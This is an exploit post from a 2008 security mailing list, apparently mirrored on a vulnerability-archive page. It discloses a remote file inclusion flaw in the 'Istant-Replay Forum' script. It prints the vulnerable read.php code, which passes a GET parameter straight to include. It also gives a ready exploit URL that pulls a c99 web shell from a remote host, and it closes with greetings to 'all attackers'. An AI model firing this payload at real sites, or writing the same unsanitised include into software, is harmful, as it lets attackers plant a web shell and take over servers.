Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Carbon Communities forum Multiple Vulnerabilities.

Koobi Pro 6.25 poll Remote SQL Injection Vulnerability

Koobi CMS 4.2.4/4.2.5/4.3.0 Multiple Remote SQL Injection Vulnerabilities

Vulnerability in Trashbin

From:	win32.exe_(at)_w.cn <win32.exe_(at)_w.cn>
Date:	16.04.2008
Subject:	remote file include

#########################################################################
       Istant-Replay Forum  Remote File Inclusion Vulnerability
#########################################################################


## AUTHOR: THuGM4N
## Email : Win32.exe@w.cn

## Script : Istant-Replay Forum                  

## Site   : http://www.chattaitaliano.com

## Vulnerable CODE :
~~~~~~~~~~/read.php ~~~~~~~~~~~~~~~~~~~~~~
$a = $_GET['data'];
$b = $_GET['post'];

$foo = include "$a.txt";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


## BUT THE EXPLOIT IS LIKE THAT  :

http://[localhost]/[forum]/read.php?data=http://127.0.0.1/c99.txt?


##  BIGUP 2 All Attackers Around The World .

#########################################################################
     Istant-Replay Forum  Remote File Inclusion Vulnerability
#########################################################################